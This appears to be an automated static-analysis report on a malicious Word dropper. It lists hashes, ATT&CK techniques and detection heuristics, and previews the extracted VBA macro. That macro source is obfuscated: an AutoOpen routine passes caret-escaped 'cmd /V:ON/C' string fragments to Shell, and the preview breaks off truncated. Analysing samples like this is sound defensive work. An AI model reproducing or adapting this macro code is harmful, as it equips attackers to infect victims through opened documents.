Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9fff7343b067f08e…

MALICIOUS

Office (OLE)

88.2 KB Created: 2018-08-31 07:53:00 Authoring application: Microsoft Office Word First seen: 2019-11-20
MD5: 513cdd81c94a8a2c7e1831818998b76c SHA-1: 16ca1d47b8214c160e160ff34ee00901f9a75383 SHA-256: 9fff7343b067f08e84ff62c3c6c70d514847c19092a07b9d55c6b42025108ff0
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains a VBA macro with an AutoOpen subroutine that utilizes the Shell() function to execute a command. The script attempts to construct a command string, likely for downloading and executing a secondary payload, indicated by the presence of 'md /V :ON/C set 6mz=A' and other obfuscated string concatenations. The ClamAV detection 'Doc.Dropper.Chronos-6667983-0' further supports its malicious nature as a dropper.

Heuristics 7

  • ClamAV: Doc.Dropper.Chronos-6667983-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Chronos-6667983-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8985 bytes
SHA-256: c27ad3740805e3f8b54039b6e6b087a281201ff8d6293f485046403e4948bbe3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "pVibBMBFFJXu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()

On _
Error _
Resume _
Next
   Hour KpnEh / GhXTD / 34477 / FltJdh
   Hour 30843 / ZIrOD / HYoFU * GNMfbl
   Hour 87985 / CiHwVw * bSjOWr / 96299
   Hour JslXK * oCnuvr * bTldwd / oKLKFi
Shell KeyString(12 + 2 + 6 + 5 + 42) + mUmOJsMI + RAcwsXjmJz + fmZAcnS + wMOQWfkzLW + WuIDoD + jzZBfUbUN + YWnjTGTQ + IzwBXDFNnmST + HMtlvqmY, 0
   Hour pjVwIL * ubBMmR
End Sub



Attribute VB_Name = "IDVliiIBhQ"
Function fmZAcnS()

On _
Error _
Resume _
Next
Hour UOXdBO / KItJR * 21403 / uLuDUX
   Hour 30708 / HfWhf / lfXDoF / GfPvk
   Hour qNUbi * VLWnj
   Hour TJaLs * 24484
HnERDs = "md" + " /V" + "^:^O" + "N/C" + Chr(2 + 5 + 3 + 4 + 20) + "^s" + "^e^t" + " " + "^6m^z" + "=^A"
Hour WIvnwE * DXkJW / 98532 / wdwNAN
   Hour OwnOP / psZVL * 56959 / UFaLF
YiRoPkS = "^" + "AC" + "^A" + "gA" + "^A" + "^I^A" + "^ACAgA" + "^A^I^A" + "^AC" + "A^g^A" + "A^I" + "^A^AC" + "^"
Hour hBKvNw * XKZvqz * 89787 / 93983
nuOISsLcJn = "AgAAIA^" + "ACA" + "g^A^" + "A^I^A^" + "A" + "CA^" + "g" + "^A^QfA^" + "0H^A^" + "7BAa^A^" + "M^G^A0B" + "Q^YA^M"
Hour 63411 * dTBTPV * 28246 / QnBZIa
   Hour 80084 / OfLoKV * 93254 * XVBvJE
   Hour 30242 * bGWNz
aodmFimRI = "G^A" + "^9B^" + "wOA^" + "sG^Ah^B" + "Q^ZA" + "IHAiBw^" + "OAU^F" + "A" + "G^B^AR^" + "AQC" + "^A^g^A"
Hour AWOoU * Jwsuiv / OuYfs * fKidtk
   Hour 37106 * BIimm
wVllsVZDjVT = "^Q^bAU" + "G^A^0BQ" + "^S" + "A0C^" + "A^lB^w^" + "a^A"
Hour ZUErVP / 76967
   Hour FQdBn / IEPbw
YrPoOlRArz = "8^" + "G^A2^Bg" + "bA" + "k^" + "E" + "^A7" + "^" + "A^QKAU" + "^FA^G" + "BAR^" + "A^QCAg" + "^AA^L"
fmZAcnS = HnERDs + YiRoPkS + nuOISsLcJn + aodmFimRI + wVllsVZDjVT + YrPoOlRArz
   Hour vzjkN * COkYM * SkrEJ / 83185
   Hour tJiCRs * EUmqq / 53738 / hIrFq
End Function
Function wMOQWfkzLW()

On _
Error _
Resume _
Next
Hour 65552 * buzJz / DTSpj * iVJjq
   Hour 45290 * 54887 * 81202 * jsoKN
SLCzEUl = "^A^M" + "G^A^" + "WB^" + "wU" + "AQC" + "A^o^AQZ" + "A" + "^w^" + "GAp^Bg"
Hour MqvtY * hFrnrb
   Hour 28236 / 60485 * 28381 / TJdBUk
   Hour 86543 / bOjHUK
   Hour lMNiA * Qijap * Xjbku * zraon
   Hour 50650 * CnldYp
vBTud = "R^AQGAh" + "Bwb^A" + "^wG^A" + "^uB^" + "w" + "^d^A"
Hour 25020 * MwswZ * ESTdz * CzAAY
   Hour hKHhj / FIBsVE * 84737 / 74832
   Hour mbNQVj * GEcKAm / McXiN / wDOQz
lztJKnMpj = "^8GAE" + "^Bg^LA" + "cHA^j^B" + "^w^aAQ" + "C^A7B^" + "Q" + "^e^A" + "IH^A" + "^0^B^w^" + "eA^kC"
Hour WKmdjN * 94848
   Hour 97961 * VDTsYa / ziWQnH / pJcKpp
   Hour dmNjZ / HOqcdo
BQYWwZO = "A^1B" + "Q^" + "d^" + "AoH" + "^A" + "^kAAI^A" + "4^GA" + "p^B^AIA" + "M^G" + "^A^W" + "B^w^UAQ" + "C^A^"
Hour 44281 * QInAu * QSUwz * toOOT
   Hour 37655 / DYHVzM * 18039 / rhIFv
   Hour opzQRd * rsiCTz / 10648 * YwJSun
ArsIUVLqV = "oAAa" + "AM^G" + "^A^" + "hBQ^" + "ZAI^H"
Hour GLiLSs * 42021 / 44650 * 5142
   Hour 698 * MwdDS
   Hour 47276 * 69330
prXIBPnPlsn = "Av^B" + "^g^" + "ZA" + "s^D^A" + "n^AQZA" + "g" + "HAlB^g" + "L^Ac" + "C" + "^Ar^A^"
Hour ZoPNoX / FGnvr
   Hour 591 * RPPEA / 89840 / hAwPEh
czzEQvsGz = "QUAwG" + "^ATB^AJ" + "AsCAn" + "AA^XAcC" + "^"
Hour 42300 / Rqolzw
   Hour hXMoL * DplLTB
SqdsX = "Ar^" + "A^wY" + "Ak^G^A" + "s^B^g" + "^Y^A^U"
Hour DdjJf * AEKft
   Hour kBJJR * DdwvP * rsCzWw / BVWEjc
   Hour IpDPGl / zlmdz
bhwnYz = "^HA^wB^" + "gO^AY" + "H^A^u^B" + "Q^" + "ZAQCA" + "9A" + "QV^AY" + "^E^A^" + "E" + "^B^" + "AJ^"
wMOQWfkzLW = SLCzEUl + vBTud + lztJKnMpj + BQYWwZO + ArsIUVLqV + prXIBPnPlsn + czzEQvsGz + SqdsX + bhwnYz
   Hour 36932 / drwHRr * 12578 * 22413
   Hour 82549 * wZjvz / AOmkjr / sTcazt
End Function
Function WuIDoD()

On _
Error _
Resume _
Next
Hour tSAWa * 40310 / 21784 / 89753
   Hour qNFNd * IpocWC
RPiAisVszww = "A^s" + "DAn" + "^A^w" + "N^A^U^D" + "A" + "xAwJA^" + "A" + "CA9AA^" + "I^" + "AEF" + "^A^s^
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.